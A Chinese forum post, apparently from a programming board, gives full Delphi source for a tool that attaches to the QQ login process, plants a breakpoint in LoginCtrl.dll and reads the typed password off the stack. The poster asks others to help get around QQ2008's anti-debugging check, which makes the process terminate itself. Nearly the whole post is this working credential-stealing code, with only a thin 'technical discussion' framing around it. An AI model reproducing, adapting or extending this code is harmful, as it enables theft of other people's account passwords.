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据说如下的代码可以得到QQ2007的密码,但我在测试QQ2008时发现QQ针对调试做了处理,进程自行终止,我把代码贴出来,看看各位大侠能否改进一下。做为一种技术,希望大家能够积极讨论一下:QQ密码的保护是否值得借鉴。unit Unit1;interfaceuses Windows, Classes, Controls, Forms, StdCtrls, ExtCtrls, ComCtrls, PsAPI, StrUtils, SysUtils, Messages;type TForm1 = class(TForm) btn1: TButton; Label1: TLabel; procedure btn1Click(Sender: TObject); private { Private declarations } public { Public declarations } end;var Form1: TForm1; ProcessID: DWORD;const Code: DWORD = $CC; JCode: DWORD =$8D;implementation{$R *.dfm}function HexToInt(HexStr: string): Int64;var RetVar: Int64; i: Byte;begin HexStr := UpperCase(HexStr); if HexStr[Length(HexStr)] = 'H' then Delete(HexStr, Length(HexStr), 1); RetVar := 0; for i := 1 to Length(HexStr) do begin RetVar := RetVar shl 4; if HexStr in ['0'..'9'] then RetVar := RetVar + (Byte(HexStr) - 48) else if HexStr in ['A'..'F'] then RetVar := RetVar + (Byte(HexStr) - 55) else begin Retvar := 0; Break; end; end; Result := RetVar;end;function GetMem(nOK: THANDLE; Addr: DWORD; Len: Integer = 0): string;const FindCount = 100;var Buf1: array[0..FindCount] of PChar; OK: BOOL; nSize: DWORD; lpNumberOfBytesRead: Cardinal; Res, Tmp: string; S: array[0..FindCount] of string; i: Integer;begin if Len <> 0 then begin nSize := Len; Buf1[0] := AllocMem(nSize); OK := ReadProcessMemory(nOK, Pointer(Addr), Buf1[0], nSize, lpNumberOfBytesRead); if(OK or (nSize <> lpNumberOfBytesRead)) then begin S[0] := ''; for i := 0 to nSize - 1 do S[0] := S[0] + Format('%.2X', [Ord(Buf1[0])]); end; FreeMem(Buf1[0], nSize); Tmp := S[0]; i := 1; Res := ''; while i < Length(Tmp) do begin Res := Res + Chr(HexToInt(Copy(Tmp, i, 2))); Inc(i, 2); end; Result := Res; Exit; end;end;procedure NewProcess;var I: Integer; Count: DWORD; ModHandles: array[0..$3FFF - 1] of DWORD; ModInfo: TModuleInfo; ModName: array[0..MAX_PATH] of Char; Num: Cardinal; Rc, OK: Boolean; DebugD: DEBUG_EVENT; Context: _CONTEXT; Base: Pointer; ProcHand: THandle; ThreadHandle: THandle; EAX: string;begin ProcHand := OpenProcess(PROCESS_ALL_ACCESS, False, ProcessID); if ProcHand <> 0 then try EnumProcessModules(ProcHand, @ModHandles, SizeOf(ModHandles), Count); for I := 0 to (Count div SizeOf(DWORD)) - 1 do if (GetModuleFileNameEx(ProcHand, ModHandles, ModName, SizeOf(ModName)) > 0) and GetModuleInformation(ProcHand, ModHandles, @ModInfo, SizeOf(ModInfo)) and (RightStr(UpperCase(ModName), 13) = 'LOGINCTRL.DLL') then begin if DWORD(ModInfo.EntryPoint) - DWORD(ModInfo.lpBaseOfDll) = $23C33 then //新加的针对QQ2008版 Base := Pointer(DWORD(ModInfo.lpBaseOfDll) + $16DE0); if DWORD(ModInfo.EntryPoint) - DWORD(ModInfo.lpBaseOfDll) = $22C3A then Base := Pointer(DWORD(ModInfo.lpBaseOfDll) + $15C90); if DWORD(ModInfo.EntryPoint) - DWORD(ModInfo.lpBaseOfDll) = $2043A then Base := Pointer(DWORD(ModInfo.lpBaseOfDll) + $148A3); OK := WriteProcessMemory(ProcHand, Base, @Code, 1, Num); if not OK then Exit; if not DebugActiveProcess(ProcessID) then Exit; Rc := True; while WaitForDebugEvent(DebugD, INFINITE) do begin case DebugD.dwDebugEventCode of EXIT_PROCESS_DEBUG_EVENT: begin Form1.Label1.Caption := '被调试进程中止'; Break; end; CREATE_PROCESS_DEBUG_EVENT: begin ThreadHandle := DebugD.CreateProcessInfo.hThread; Form1.Label1.Caption := '请输入密码后点击登录'; end; EXCEPTION_DEBUG_EVENT: begin case DebugD.Exception.ExceptionRecord.ExceptionCode of EXCEPTION_BREAKPOINT: begin if Base = DebugD.Exception.ExceptionRecord.ExceptionAddress then begin Context.ContextFlags := CONTEXT_FULL; GetThreadContext(ThreadHandle, Context); EAX := Trim(GetMem(ProcHand, Context.Esp + $24, 20)); Form1.Label1.Caption := 'QQ密码: ' + EAX; Rc := WriteProcessMemory(ProcHand, Pointer(DWORD(Base)), @JCode, 1, Num); Context.Eip := DWORD(Base); SetThreadContext(ThreadHandle, Context); end; end; end; end; end; if Rc then ContinueDebugEvent(DebugD.dwProcessId, DebugD.dwThreadId, DBG_CONTINUE) else ContinueDebugEvent(DebugD.dwProcessId, DebugD.dwThreadId, DBG_EXCEPTION_NOT_HANDLED); end; CloseHandle(ThreadHandle); end; finally CloseHandle(ProcHand); end;end;procedure TForm1.btn1Click(Sender: TObject);var h: HWND; ThreadID: THandle;begin h := FindWindow(nil, 'QQ用户登录'); if h = 0 then begin Label1.Caption := '没有找到QQ登录框'; Exit; end; GetWindowThreadProcessId(h, ProcessID); CreateThread(nil, 0, @NewProcess, nil, 0, ThreadID);end;end.end.